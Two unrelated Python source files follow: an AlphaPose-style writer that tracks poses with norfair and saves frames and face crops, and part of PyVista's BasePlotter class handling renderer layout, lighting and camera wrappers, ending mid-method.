writer.py
import os
import time
from threading import Thread
from queue import Queue
import cv2
import numpy as np
import torch
import torch.multiprocessing as mp
from alphapose.utils.transforms import get_func_heatmap_to_coord
from alphapose.utils.pPose_nms import pose_nms, write_json
from alphapose.utils.data_recorder import DataRecorder
from alphapose.face.face_from_keypoints import Face
import norfair
face = Face()
DEFAULT_VIDEO_SAVE_OPT = {
'savepath': 'examples/res/1.mp4',
'fourcc': cv2.VideoWriter_fourcc(*'mp4v'),
'fps': 25,
'frameSize': (640, 480)
}
EVAL_JOINTS = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16]
detection_threshold = 0.2
keypoint_dist_threshold = None
def keypoints_distance(detected_pose, tracked_pose):
distances = np.linalg.norm(detected_pose.points - tracked_pose.estimate, axis=1)
match_num = np.count_nonzero(
(distances < keypoint_dist_threshold)
* (detected_pose.scores > detection_threshold)
* (tracked_pose.last_detection.scores > detection_threshold)
)
return 1 / (1 + match_num)
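# Illustrative note (not part of the original pipeline): with the tracker
# configured below (distance_threshold=0.3), 1 / (1 + match_num) only drops
# below the threshold when match_num >= 3, i.e. at least three keypoints must
# lie within keypoint_dist_threshold pixels and exceed detection_threshold on
# both the detection and the tracked estimate for a match to be accepted.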
class DataWriter():
def __init__(self, cfg, opt, save_video=False,
video_save_opt=DEFAULT_VIDEO_SAVE_OPT,
queueSize=1024):
self.cfg = cfg
self.opt = opt
self.video_save_opt = video_save_opt
self.eval_joints = EVAL_JOINTS
self.save_video = save_video
self.heatmap_to_coord = get_func_heatmap_to_coord(cfg)
# initialize the queue used to store frames read from
# the video file
if opt.sp:
self.result_queue = Queue(maxsize=queueSize)
else:
self.result_queue = mp.Queue(maxsize=queueSize)
if opt.save_img:
if not os.path.exists(opt.outputpath + '/vis'):
os.mkdir(opt.outputpath + '/vis')
if opt.pose_flow:
from trackers.PoseFlow.poseflow_infer import PoseFlowWrapper
self.pose_flow_wrapper = PoseFlowWrapper(save_path=os.path.join(opt.outputpath, 'poseflow'))
self.tracker = norfair.Tracker(
distance_function=keypoints_distance,
distance_threshold=0.3,
detection_threshold=0.2
)
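# Note: keypoint_dist_threshold used by keypoints_distance() is resolved
# lazily; it is set per frame in update() as orig_img.shape[0] / 30.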
self.data_recorder = DataRecorder()
def clear_data(self):
# self.data_recorder.clear_data()
face.clear_data()
def export_data(self, fname):
fpath = os.path.join(self.opt.outputpath, 'vis', '{}.csv'.format(fname))
print(fpath)
# self.data_recorder.export_data(os.path.join(opt.outputpath, 'vis') , '{}'.format(fname))
face.export_data(fpath)
def start_worker(self, target):
if self.opt.sp:
p = Thread(target=target, args=())
else:
p = mp.Process(target=target, args=())
# p.daemon = True
p.start()
return p
def start(self):
# start a thread to read pose estimation results per frame
self.result_worker = self.start_worker(self.update)
return self
def update(self):
# final_result = []
norm_type = self.cfg.LOSS.get('NORM_TYPE', None)
hm_size = self.cfg.DATA_PRESET.HEATMAP_SIZE
if self.save_video:
# initialize the file video stream, adapt output video resolution to the original video
stream = cv2.VideoWriter(*[self.video_save_opt[k] for k in ['savepath', 'fourcc', 'fps', 'frameSize']])
if not stream.isOpened():
print("Try to use other video encoders...")
ext = self.video_save_opt['savepath'].split('.')[-1]
fourcc, _ext = self.recognize_video_ext(ext)
self.video_save_opt['fourcc'] = fourcc
self.video_save_opt['savepath'] = self.video_save_opt['savepath'][:-4] + _ext
stream = cv2.VideoWriter(*[self.video_save_opt[k] for k in ['savepath', 'fourcc', 'fps', 'frameSize']])
assert stream.isOpened(), 'Cannot open video for writing'
# keep looping infinitely
while True:
# ensure the queue is not empty and get item
(boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name) = self.wait_and_get(self.result_queue)
if orig_img is None:
# if the thread indicator variable is set (img is None), stop the thread
if self.save_video:
stream.release()
# write_json(final_result, self.opt.outputpath, form=self.opt.format, for_eval=self.opt.eval)
# print("Results have been written to json.")
return
# image channel RGB->BGR
orig_img = np.array(orig_img, dtype=np.uint8)[:, :, ::-1]
if boxes is None or len(boxes) == 0:
if self.opt.save_img or self.save_video or self.opt.vis:
self.write_image(orig_img, im_name, stream=stream if self.save_video else None)
else:
# location prediction (n, kp, 2) | score prediction (n, kp, 1)
assert hm_data.dim() == 4
#pred = hm_data.cpu().data.numpy()
if hm_data.size()[1] == 136:
self.eval_joints = [*range(0,136)]
elif hm_data.size()[1] == 26:
self.eval_joints = [*range(0,26)]
pose_coords = []
pose_scores = []
for i in range(hm_data.shape[0]):
bbox = cropped_boxes[i].tolist()
pose_coord, pose_score = self.heatmap_to_coord(hm_data[i][self.eval_joints], bbox, hm_shape=hm_size, norm_type=norm_type)
pose_coords.append(torch.from_numpy(pose_coord).unsqueeze(0))
pose_scores.append(torch.from_numpy(pose_score).unsqueeze(0))
preds_img = torch.cat(pose_coords)
preds_scores = torch.cat(pose_scores)
if not self.opt.pose_track:
boxes, scores, ids, preds_img, preds_scores, pick_ids = \
pose_nms(boxes, scores, ids, preds_img, preds_scores, self.opt.min_box_area)
_result = []
for k in range(len(scores)):
_result.append(
{
'keypoints':preds_img[k],
'kp_score':preds_scores[k],
'proposal_score': torch.mean(preds_scores[k]) + scores[k] + 1.25 * max(preds_scores[k]),
'idx':ids[k],
'box':[boxes[k][0], boxes[k][1], boxes[k][2]-boxes[k][0],boxes[k][3]-boxes[k][1]]
}
)
result = {
'imgname': im_name,
'result': _result
}
if self.opt.pose_flow:
poseflow_result = self.pose_flow_wrapper.step(orig_img, result)
for i in range(len(poseflow_result)):
result['result'][i]['idx'] = poseflow_result[i]['idx']
global keypoint_dist_threshold
keypoint_dist_threshold = orig_img.shape[0] / 30
detections = [
norfair.Detection(p['keypoints'].numpy(), scores=p['kp_score'].squeeze().numpy())
for p in result['result']
]
tracked_objects = self.tracker.update(detections=detections)
norfair.draw_tracked_objects(orig_img.copy(), tracked_objects)
# self.cropped(orig_img.copy(), tracked_objects)
face.export_face_img(tracked_objects, orig_img.copy(), os.path.join(self.opt.outputpath, 'vis'), vdo_fname='id')
# final_result.append(result)
if self.opt.save_img or self.save_video or self.opt.vis:
if hm_data.size()[1] == 49:
from alphapose.utils.vis import vis_frame_dense as vis_frame
elif self.opt.vis_fast:
from alphapose.utils.vis import vis_frame_fast as vis_frame
else:
from alphapose.utils.vis import vis_frame
img = vis_frame(orig_img, result, self.opt)
self.write_image(img, im_name, stream=stream if self.save_video else None)
def write_image(self, img, im_name, stream=None):
if self.opt.vis:
cv2.imshow("AlphaPose Demo", img)
cv2.waitKey(30)
if self.opt.save_img:
cv2.imwrite(os.path.join(self.opt.outputpath, 'vis', im_name), img)
if self.save_video:
stream.write(img)
def wait_and_put(self, queue, item):
queue.put(item)
def wait_and_get(self, queue):
return queue.get()
def save(self, boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name):
# save next frame in the queue
self.wait_and_put(self.result_queue, (boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name))
def running(self):
# indicate that the thread is still running
return not self.result_queue.empty()
def count(self):
# indicate the remaining images
return self.result_queue.qsize()
def stop(self):
# indicate that the thread should be stopped
self.save(None, None, None, None, None, None, None)
self.result_worker.join()
def terminate(self):
# directly terminate
self.result_worker.terminate()
def clear_queues(self):
self.clear(self.result_queue)
def clear(self, queue):
while not queue.empty():
queue.get()
def results(self):
# return final result (note: per-frame result accumulation in update() is
# currently commented out, so this only works if final_result is restored)
print(self.final_result)
return self.final_result
def recognize_video_ext(self, ext=''):
if ext == 'mp4':
return cv2.VideoWriter_fourcc(*'mp4v'), '.' + ext
elif ext == 'avi':
return cv2.VideoWriter_fourcc(*'XVID'), '.' + ext
elif ext == 'mov':
return cv2.VideoWriter_fourcc(*'XVID'), '.' + ext
else:
print("Unknow video format {}, will use .mp4 instead of it".format(ext))
return cv2.VideoWriter_fourcc(*'mp4v'), '.mp4'
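# Minimal usage sketch (illustrative only; assumes an AlphaPose `cfg`/`opt`
# pair and an upstream detection/pose loop producing the per-frame tensors):
#
#   writer = DataWriter(cfg, opt, save_video=False).start()
#   for frame_data in pose_results:              # hypothetical iterable of
#       writer.save(*frame_data)                 # (boxes, scores, ids, hm_data,
#                                                #  cropped_boxes, orig_img, im_name)
#   writer.stop()                                # sends the None sentinel and joins
#   writer.export_data('session')                # writes <outputpath>/vis/session.csv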
plotting.py
"""Pyvista plotting module."""
import pathlib
import collections.abc
from functools import partial
import logging
import os
import time
import warnings
from functools import wraps
from threading import Thread
import imageio
import numpy as np
import scooby
import vtk
from vtk.util import numpy_support as VN
from vtk.util.numpy_support import numpy_to_vtk, vtk_to_numpy
import pyvista
from pyvista.utilities import (assert_empty_kwargs,
convert_array, convert_string_array, get_array,
is_pyvista_dataset, numpy_to_texture, abstract_class,
raise_not_matching, try_callback, wrap)
from .background_renderer import BackgroundRenderer
from .colors import get_cmap_safe
from .export_vtkjs import export_plotter_vtkjs
from .mapper import make_mapper
from .picking import PickingHelper
from .renderer import Renderer
from .theme import (FONT_KEYS, MAX_N_COLOR_BARS, parse_color,
parse_font_family, rcParams)
from .tools import normalize, opacity_transfer_function
from .widgets import WidgetHelper
try:
import matplotlib
has_matplotlib = True
except ImportError:
has_matplotlib = False
_ALL_PLOTTERS = {}
def close_all():
"""Close all open/active plotters and clean up memory."""
for key, p in _ALL_PLOTTERS.items():
if not p._closed:
p.close()
p.deep_clean()
_ALL_PLOTTERS.clear()
return True
log = logging.getLogger(__name__)
log.setLevel('CRITICAL')
log.addHandler(logging.StreamHandler())
@abstract_class
class BasePlotter(PickingHelper, WidgetHelper):
"""To be used by the Plotter and pyvistaqt.QtInteractor classes.
Parameters
----------
shape : list or tuple, optional
Number of sub-render windows inside of the main window.
Specify two across with ``shape=(2, 1)`` and a two by two grid
with ``shape=(2, 2)``. By default there is only one renderer.
Can also accept a string descriptor as shape. E.g.:
* ``shape="3|1"`` means 3 plots on the left and 1 on the right,
* ``shape="4/2"`` means 4 plots on top and 2 at the bottom.
border : bool, optional
Draw a border around each render window. Default False.
border_color : string or 3 item list, optional, defaults to black
Either a string, rgb list, or hex color string. For example:
* ``color='white'``
* ``color='w'``
* ``color=[1, 1, 1]``
* ``color='#FFFFFF'``
border_width : float, optional
Width of the border in pixels when enabled.
title : str, optional
Title of the render window
"""
mouse_position = None
click_position = None
def __init__(self, shape=(1, 1), border=None, border_color='k',
border_width=2.0, title=None, splitting_position=None,
groups=None, row_weights=None, col_weights=None):
"""Initialize base plotter."""
log.debug('BasePlotter init start')
self.image_transparent_background = rcParams['transparent_background']
self._store_image = False
self.mesh = None
if title is None:
title = rcParams['title']
self.title = str(title)
# by default add border for multiple plots
if border is None:
if shape != (1, 1):
border = True
else:
border = False
# add render windows
self._active_renderer_index = 0
self.renderers = []
self.groups = np.empty((0,4),dtype=int)
if isinstance(shape, str):
if '|' in shape:
n = int(shape.split('|')[0])
m = int(shape.split('|')[1])
rangen = reversed(range(n))
rangem = reversed(range(m))
else:
m = int(shape.split('/')[0])
n = int(shape.split('/')[1])
rangen = range(n)
rangem = range(m)
if splitting_position is None:
splitting_position = rcParams['multi_rendering_splitting_position']
if splitting_position is None:
if n >= m:
xsplit = m/(n+m)
else:
xsplit = 1-n/(n+m)
else:
xsplit = splitting_position
for i in rangen:
arenderer = Renderer(self, border, border_color, border_width)
if '|' in shape:
arenderer.SetViewport(0, i/n, xsplit, (i+1)/n)
else:
arenderer.SetViewport(i/n, 0, (i+1)/n, xsplit)
self.renderers.append(arenderer)
for i in rangem:
arenderer = Renderer(self, border, border_color, border_width)
if '|' in shape:
arenderer.SetViewport(xsplit, i/m, 1, (i+1)/m)
else:
arenderer.SetViewport(i/m, xsplit, (i+1)/m, 1)
self.renderers.append(arenderer)
self.shape = (n+m,)
self._render_idxs = np.arange(n+m)
else:
if not isinstance(shape, (np.ndarray, collections.abc.Sequence)):
raise TypeError('"shape" should be a list, tuple or string descriptor')
if len(shape) != 2:
raise ValueError('"shape" must have length 2.')
shape = np.asarray(shape)
if not np.issubdtype(shape.dtype, np.integer) or (shape <= 0).any():
raise ValueError('"shape" must contain only positive integers.')
# always assign shape as a tuple
self.shape = tuple(shape)
self._render_idxs = np.empty(self.shape,dtype=int)
# Check if row and col weights correspond to given shape, or initialize them to defaults (equally weighted)
# and convert to normalized offsets
if row_weights is None:
row_weights = np.ones(shape[0])
if col_weights is None:
col_weights = np.ones(shape[1])
assert(np.array(row_weights).size==shape[0])
assert(np.array(col_weights).size==shape[1])
row_off = np.cumsum(np.abs(row_weights))/np.sum(np.abs(row_weights))
row_off = 1-np.concatenate(([0],row_off))
col_off = np.cumsum(np.abs(col_weights))/np.sum(np.abs(col_weights))
col_off = np.concatenate(([0],col_off))
# Check and convert groups to internal format (Nx4 matrix where every row contains the row and col index of the top left cell
# together with the row and col index of the bottom right cell)
if groups is not None:
assert isinstance(groups, collections.abc.Sequence), '"groups" should be a list or tuple'
for group in groups:
assert isinstance(group, collections.abc.Sequence) and len(group)==2, 'each group entry should be a list or tuple of 2 elements'
rows = group[0]
if isinstance(rows,slice):
rows = np.arange(self.shape[0],dtype=int)[rows]
cols = group[1]
if isinstance(cols,slice):
cols = np.arange(self.shape[1],dtype=int)[cols]
# Get the normalized group, i.e. extract top left corner and bottom right corner from the given rows and cols
norm_group = [np.min(rows),np.min(cols),np.max(rows),np.max(cols)]
# Check for overlap with already defined groups:
for i in range(norm_group[0],norm_group[2]+1):
for j in range(norm_group[1],norm_group[3]+1):
assert self.loc_to_group((i,j)) is None, 'groups cannot overlap'
self.groups = np.concatenate((self.groups,np.array([norm_group],dtype=int)),axis=0)
# Create subplot renderers
for row in range(shape[0]):
for col in range(shape[1]):
group = self.loc_to_group((row,col))
nb_rows = None
nb_cols = None
if group is not None:
if row==self.groups[group,0] and col==self.groups[group,1]:
# Only add renderer for first location of the group
nb_rows = 1+self.groups[group,2]-self.groups[group,0]
nb_cols = 1+self.groups[group,3]-self.groups[group,1]
else:
nb_rows = 1
nb_cols = 1
if nb_rows is not None:
renderer = Renderer(self, border, border_color, border_width)
x0 = col_off[col]
y0 = row_off[row+nb_rows]
x1 = col_off[col+nb_cols]
y1 = row_off[row]
renderer.SetViewport(x0, y0, x1, y1)
self._render_idxs[row,col] = len(self.renderers)
self.renderers.append(renderer)
else:
self._render_idxs[row,col] = self._render_idxs[self.groups[group,0],self.groups[group,1]]
# each render will also have an associated background renderer
self._background_renderers = [None for _ in range(len(self.renderers))]
# create a shadow renderer that lives on top of all others
self._shadow_renderer = Renderer(
self, border, border_color, border_width)
self._shadow_renderer.SetViewport(0, 0, 1, 1)
self._shadow_renderer.SetDraw(False)
# This keeps track of scalars names already plotted and their ranges
self._scalar_bar_ranges = {}
self._scalar_bar_mappers = {}
self._scalar_bar_actors = {}
self._scalar_bar_widgets = {}
# track if the camera has been setup
# self.camera_set = False
self._first_time = True
# Keep track of the scale
self._labels = []
# Set default style
self._style = 'RubberBandPick'
self._style_class = None
# this helps managing closed plotters
self._closed = False
# Add self to open plotters
self._id_name = f"{hex(id(self))}-{len(_ALL_PLOTTERS)}"
_ALL_PLOTTERS[self._id_name] = self
# lighting style
self.disable_3_lights()
# Key bindings
self.reset_key_events()
log.debug('BasePlotter init stop')
#### Manage the active Renderer ####
def loc_to_group(self, loc):
"""Return group id of the given location index. Or None if this location is not part of any group."""
group_idxs = np.arange(self.groups.shape[0])
I = (loc[0]>=self.groups[:,0]) & (loc[0]<=self.groups[:,2]) & (loc[1]>=self.groups[:,1]) & (loc[1]<=self.groups[:,3])
group = group_idxs[I]
return None if group.size==0 else group[0]
def loc_to_index(self, loc):
"""Return index of the render window given a location index.
Parameters
----------
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``.
Return
------
idx : int
Index of the render window.
"""
if loc is None:
return self._active_renderer_index
elif isinstance(loc, (int, np.integer)):
return loc
elif isinstance(loc, (np.ndarray, collections.abc.Sequence)):
if not len(loc) == 2:
raise ValueError('"loc" must contain two items')
index_row = loc[0]
index_column = loc[1]
if index_row < 0 or index_row >= self.shape[0]:
raise IndexError(f'Row index is out of range ({self.shape[0]})')
if index_column < 0 or index_column >= self.shape[1]:
raise IndexError(f'Column index is out of range ({self.shape[1]})')
return self._render_idxs[index_row,index_column]
else:
raise TypeError('"loc" must be an integer or a sequence.')
def index_to_loc(self, index):
"""Convert a 1D index location to the 2D location on the plotting grid."""
if not isinstance(index, (int, np.integer)):
raise TypeError('"index" must be a scalar integer.')
if len(self.shape) == 1:
return index
args = np.argwhere(self._render_idxs == index)
if len(args) < 1:
raise IndexError(f'Index ({index}) is out of range.')
return args[0]
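# Example (illustrative, groups-free 2x2 layout; renderers are created row-major):
#   loc_to_index((1, 1)) -> 3   and   index_to_loc(3) -> array([1, 1])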
@property
def renderer(self):
"""Return the active renderer."""
return self.renderers[self._active_renderer_index]
@property
def store_image(self):
"""Return if an image will be saved on close."""
return self._store_image
@store_image.setter
def store_image(self, value):
"""Store last rendered frame on close."""
self._store_image = bool(value)
def subplot(self, index_row, index_column=None):
"""Set the active subplot.
Parameters
----------
index_row : int
Index of the subplot to activate along the rows.
index_column : int
Index of the subplot to activate along the columns.
"""
if len(self.shape) == 1:
self._active_renderer_index = index_row
return
if index_row < 0 or index_row >= self.shape[0]:
raise IndexError(f'Row index is out of range ({self.shape[0]})')
if index_column < 0 or index_column >= self.shape[1]:
raise IndexError(f'Column index is out of range ({self.shape[1]})')
self._active_renderer_index = self.loc_to_index((index_row, index_column))
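# Typical subplot usage (sketch): a Plotter created with shape=(2, 2) exposes
# four renderers; plotter.subplot(0, 1) activates the top-right one, so the
# wrapped Renderer calls below (add_mesh, show_axes, ...) target that subplot.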
#### Wrap Renderer methods ####
@wraps(Renderer.add_floor)
def add_floor(self, *args, **kwargs):
"""Wrap ``Renderer.add_floor``."""
return self.renderer.add_floor(*args, **kwargs)
@wraps(Renderer.remove_floors)
def remove_floors(self, *args, **kwargs):
"""Wrap ``Renderer.remove_floors``."""
return self.renderer.remove_floors(*args, **kwargs)
def enable_3_lights(self):
"""Enable 3-lights illumination."""
def _to_pos(elevation, azimuth):
theta = azimuth * np.pi / 180.0
phi = (90.0 - elevation) * np.pi / 180.0
x = np.sin(theta) * np.sin(phi)
y = np.cos(phi)
z = np.cos(theta) * np.sin(phi)
return x, y, z
# Inspired from Mayavi's version of Raymond Maple 3-lights illumination
lights = list(self.renderer.GetLights())
headlight = lights.pop(0)
headlight.SetSwitch(False)
for i in range(len(lights)):
if i < 3:
lights[i].SetSwitch(True)
lights[i].SetIntensity(1.0)
lights[i].SetColor(1.0, 1.0, 1.0)
else:
lights[i].SetSwitch(False)
lights[i].SetPosition(_to_pos(0.0, 0.0))
lights[i].SetIntensity(1.0)
lights[i].SetColor(1.0, 1.0, 1.0)
lights[0].SetPosition(_to_pos(45.0, 45.0))
lights[1].SetPosition(_to_pos(-30.0, -60.0))
lights[1].SetIntensity(0.6)
lights[2].SetPosition(_to_pos(-30.0, 60.0))
lights[2].SetIntensity(0.5)
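# Note: _to_pos maps (elevation, azimuth) in degrees to a unit direction with
# y as the up axis (elevation=90 gives (0, 1, 0)), which is how the key and
# fill light positions above are placed around the camera.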
def disable_3_lights(self):
"""Disable 3-lights illumination."""
self.lighting = vtk.vtkLightKit()
# self.lighting.SetHeadLightWarmth(1.0)
# self.lighting.SetHeadLightWarmth(1.0)
for renderer in self.renderers:
renderer.RemoveAllLights()
self.lighting.AddLightsToRenderer(renderer)
renderer.LightFollowCameraOn()
@wraps(Renderer.enable_anti_aliasing)
def enable_anti_aliasing(self, *args, **kwargs):
"""Wrap ``Renderer.enable_anti_aliasing``."""
self.renderer.enable_anti_aliasing(*args, **kwargs)
@wraps(Renderer.disable_anti_aliasing)
def disable_anti_aliasing(self, *args, **kwargs):
"""Wrap ``Renderer.disable_anti_aliasing``."""
self.renderer.disable_anti_aliasing(*args, **kwargs)
@wraps(Renderer.set_focus)
def set_focus(self, *args, **kwargs):
"""Wrap ``Renderer.set_focus``."""
self.renderer.set_focus(*args, **kwargs)
self.render()
@wraps(Renderer.set_position)
def set_position(self, *args, **kwargs):
"""Wrap ``Renderer.set_position``."""
self.renderer.set_position(*args, **kwargs)
self.render()
@wraps(Renderer.set_viewup)
def set_viewup(self, *args, **kwargs):
"""Wrap ``Renderer.set_viewup``."""
self.renderer.set_viewup(*args, **kwargs)
self.render()
@wraps(Renderer.add_orientation_widget)
def add_orientation_widget(self, *args, **kwargs):
"""Wrap ``Renderer.add_orientation_widget``."""
return self.renderer.add_orientation_widget(*args, **kwargs)
@wraps(Renderer.add_axes)
def add_axes(self, *args, **kwargs):
"""Wrap ``Renderer.add_axes``."""
return self.renderer.add_axes(*args, **kwargs)
@wraps(Renderer.hide_axes)
def hide_axes(self, *args, **kwargs):
"""Wrap ``Renderer.hide_axes``."""
return self.renderer.hide_axes(*args, **kwargs)
@wraps(Renderer.show_axes)
def show_axes(self, *args, **kwargs):
"""Wrap ``Renderer.show_axes``."""
return self.renderer.show_axes(*args, **kwargs)
@wraps(Renderer.update_bounds_axes)
def update_bounds_axes(self, *args, **kwargs):
"""Wrap ``Renderer.update_bounds_axes``."""
return self.renderer.update_bounds_axes(*args, **kwargs)
@wraps(Renderer.add_actor)
def add_actor(self, *args, **kwargs):
"""Wrap ``Renderer.add_actor``."""
return self.renderer.add_actor(*args, **kwargs)
@wraps(Renderer.enable_parallel_projection)
def enable_parallel_projection(self, *args, **kwargs):
"""Wrap ``Renderer.enable_parallel_projection``."""
return self.renderer.enable_parallel_projection(*args, **kwargs)
@wraps(Renderer.disable_parallel_projection)
def disable_parallel_projection(self, *args, **kwargs):
"""Wrap ``Renderer.disable_parallel_projection``."""
return self.renderer.disable_parallel_projection(*args, **kwargs)
@wraps(Renderer.add_axes_at_origin)
def add_axes_at_origin(self, *args, **kwargs):
"""Wrap ``Renderer.add_axes_at_origin``."""
return self.renderer.add_axes_at_origin(*args, **kwargs)
@wraps(Renderer.show_bounds)
def show_bounds(self, *args, **kwargs):
"""Wrap ``Renderer.show_bounds``."""
return self.renderer.show_bounds(*args, **kwargs)
@wraps(Renderer.add_bounds_axes)
def add_bounds_axes(self, *args, **kwargs):
"""Wrap ``add_bounds_axes``."""
return self.renderer.add_bounds_axes(*args, **kwargs)
@wraps(Renderer.add_bounding_box)
def add_bounding_box(self, *args, **kwargs):
"""Wrap ``Renderer.add_bounding_box``."""
return self.renderer.add_bounding_box(*args, **kwargs)
@wraps(Renderer.remove_bounding_box)
def remove_bounding_box(self, *args, **kwargs):
"""Wrap ``Renderer.remove_bounding_box``."""
return self.renderer.remove_bounding_box(*args, **kwargs)
@wraps(Renderer.remove_bounds_axes)
def remove_bounds_axes(self, *args, **kwargs):
"""Wrap ``Renderer.remove_bounds_axes``."""
return self.renderer.remove_bounds_axes(*args, **kwargs)
@wraps(Renderer.show_grid)
def show_grid(self, *args, **kwargs):
"""Wrap ``Renderer.show_grid``."""
return self.renderer.show_grid(*args, **kwargs)
@wraps(Renderer.set_scale)
def set_scale(self, *args, **kwargs):
"""Wrap ``Renderer.set_scale``."""
return self.renderer.set_scale(*args, **kwargs)
@wraps(Renderer.enable_eye_dome_lighting)
def enable_eye_dome_lighting(self, *args, **kwargs):
"""Wrap ``Renderer.enable_eye_dome_lighting``."""
return self.renderer.enable_eye_dome_lighting(*args, **kwargs)
@wraps(Renderer.disable_eye_dome_lighting)
def disable_eye_dome_lighting(self, *args, **kwargs):
"""Wrap ``Renderer.disable_eye_dome_lighting``."""
return self.renderer.disable_eye_dome_lighting(*args, **kwargs)
@wraps(Renderer.reset_camera)
def reset_camera(self, *args, **kwargs):
"""Wrap ``Renderer.reset_camera``."""
self.renderer.reset_camera(*args, **kwargs)
self.render()
@wraps(Renderer.isometric_view)
def isometric_view(self, *args, **kwargs):
"""Wrap ``Renderer.isometric_view``."""
return self.renderer.isometric_view(*args, **kwargs)
@wraps(Renderer.view_isometric)
def view_isometric(self, *args, **kwarg):
"""Wrap ``Renderer.view_isometric``."""
return self.renderer.view_isometric(*args, **kwarg)
@wraps(Renderer.view_vector)
def view_vector(self, *args, **kwarg):
"""Wrap ``Renderer.view_vector``."""
return self.renderer.view_vector(*args, **kwarg)
@wraps(Renderer.view_xy)
def view_xy(self, *args, **kwarg):
"""Wrap ``Renderer.view_xy``."""
return self.renderer.view_xy(*args, **kwarg)
@wraps(Renderer.view_yx)
def view_yx(self, *args, **kwarg):
"""Wrap ``Renderer.view_yx``."""
return self.renderer.view_yx(*args, **kwarg)
@wraps(Renderer.view_xz)
def view_xz(self, *args, **kwarg):
"""Wrap ``Renderer.view_xz``."""
return self.renderer.view_xz(*args, **kwarg)
@wraps(Renderer.view_zx)
def view_zx(self, *args, **kwarg):
"""Wrap ``Renderer.view_zx``."""
return self.renderer.view_zx(*args, **kwarg)
@wraps(Renderer.view_yz)
def view_yz(self, *args, **kwarg):
"""Wrap ``Renderer.view_yz``."""
return self.renderer.view_yz(*args, **kwarg)
@wraps(Renderer.view_zy)
def view_zy(self, *args, **kwarg):
"""Wrap ``Renderer.view_zy``."""
return self.renderer.view_zy(*args, **kwarg)
@wraps(Renderer.disable)
def disable(self, *args, **kwarg):
"""Wrap ``Renderer.disable``."""
return self.renderer.disable(*args, **kwarg)
@wraps(Renderer.enable)
def enable(self, *args, **kwarg):
"""Wrap ``Renderer.enable``."""
return self.renderer.enable(*args, **kwarg)
@wraps(Renderer.enable_depth_peeling)
def enable_depth_peeling(self, *args, **kwargs):
"""Wrap ``Renderer.enable_depth_peeling``."""
if hasattr(self, 'ren_win'):
result = self.renderer.enable_depth_peeling(*args, **kwargs)
if result:
self.ren_win.AlphaBitPlanesOn()
return result
@wraps(Renderer.disable_depth_peeling)
def disable_depth_peeling(self):
"""Wrap ``Renderer.disable_depth_peeling``."""
if hasattr(self, 'ren_win'):
self.ren_win.AlphaBitPlanesOff()
return self.renderer.disable_depth_peeling()
@wraps(Renderer.get_default_cam_pos)
def get_default_cam_pos(self, *args, **kwargs):
"""Wrap ``Renderer.get_default_cam_pos``."""
return self.renderer.get_default_cam_pos(*args, **kwargs)
@wraps(Renderer.remove_actor)
def remove_actor(self, actor, reset_camera=False):
"""Wrap ``Renderer.remove_actor``."""
for renderer in self.renderers:
renderer.remove_actor(actor, reset_camera)
return True
#### Properties from Renderer ####
@property
def camera(self):
"""Return the active camera of the active renderer."""
return self.renderer.camera
@camera.setter
def camera(self, camera):
"""Set the active camera for the rendering scene."""
self.renderer.camera = camera
@property
def camera_set(self):
"""Return if the camera of the active renderer has been set."""
return self.renderer.camera_set
@camera_set.setter
def camera_set(self, is_set):
"""Set if the camera has been set on the active renderer."""
self.renderer.camera_set = is_set
@property
def bounds(self):
"""Return the bounds of the active renderer."""
return self.renderer.bounds
@property
def length(self):
"""Return the length of the diagonal of the bounding box of the scene."""
return self.renderer.length
@property
def center(self):
"""Return the center of the active renderer."""
return self.renderer.center
@property
def _scalar_bar_slots(self):
"""Return the scalar bar slots of the active renderer."""
return self.renderer._scalar_bar_slots
@property
def _scalar_bar_slot_lookup(self):
"""Return the scalar bar slot lookup of the active renderer."""
return self.renderer._scalar_bar_slot_lookup
@_scalar_bar_slots.setter
def _scalar_bar_slots(self, value):
"""Set the scalar bar slots of the active renderer."""
self.renderer._scalar_bar_slots = value
@_scalar_bar_slot_lookup.setter
def _scalar_bar_slot_lookup(self, value):
"""Set the scalar bar slot lookup of the active renderer."""
self.renderer._scalar_bar_slot_lookup = value
@property
def scale(self):
"""Return the scaling of the active renderer."""
return self.renderer.scale
@scale.setter
def scale(self, scale):
"""Set the scaling of the active renderer."""
self.renderer.set_scale(*scale)
@property
def camera_position(self):
"""Return camera position of the active render window."""
return self.renderer.camera_position
@camera_position.setter
def camera_position(self, camera_location):
"""Set camera position of the active render window."""
self.renderer.camera_position = camera_location
@property
def background_color(self):
"""Return the background color of the first render window."""
return self.renderers[0].GetBackground()
@background_color.setter
def background_color(self, color):
"""Set the background color of all the render windows."""
self.set_background(color)
#### Properties of the BasePlotter ####
@property
def window_size(self):
"""Return the render window size."""
return list(self.ren_win.GetSize())
@window_size.setter
def window_size(self, window_size):
"""Set the render window size."""
self.ren_win.SetSize(window_size[0], window_size[1])
@property
def image_depth(self):
"""Return a depth image representing current render window.
Helper attribute for ``get_image_depth``.
"""
return self.get_image_depth()
@property
def image(self):
"""Return an image array of current render window.
To retrieve an image after the render window has been closed,
set: `plotter.store_image = True`
"""
if not hasattr(self, 'ren_win') and hasattr(self, 'last_image'):
return self.last_image
ifilter = vtk.vtkWindowToImageFilter()
ifilter.SetInput(self.ren_win)
ifilter.ReadFrontBufferOff()
if self.image_transparent_background:
ifilter.SetInputBufferTypeToRGBA()
else:
ifilter.SetInputBufferTypeToRGB()
return self._run_image_filter(ifilter)
#### Everything else ####
def render(self):
"""Render the main window.
If this is called before ``show()``, nothing will happen.
"""
if hasattr(self, 'ren_win') and not self._first_time:
self.ren_win.Render()
# Not sure if this is ever needed but here as a reminder
# if hasattr(self, 'iren') and not self._first_time:
# self.iren.Render()
return
def add_key_event(self, key, callback):
"""Add a function to callback when the given key is pressed.
These are non-unique - thus a key could map to many callback
functions. The callback function must not have any arguments.
Parameters
----------
key : str
The key to trigger the event
callback : callable
A callable that takes no arguments
"""
if not hasattr(callback, '__call__'):
raise TypeError('callback must be callable.')
self._key_press_event_callbacks[key].append(callback)
def _add_observer(self, event, call):
if hasattr(self, 'iren'):
call = partial(try_callback, call)
self._observers[event] = self.iren.AddObserver(event, call)
def _remove_observer(self, event):
if hasattr(self, 'iren') and event in self._observers:
self.iren.RemoveObserver(event)
del self._observers[event]
def clear_events_for_key(self, key):
"""Remove the callbacks associated to the key."""
self._key_press_event_callbacks.pop(key)
def store_mouse_position(self, *args):
"""Store mouse position."""
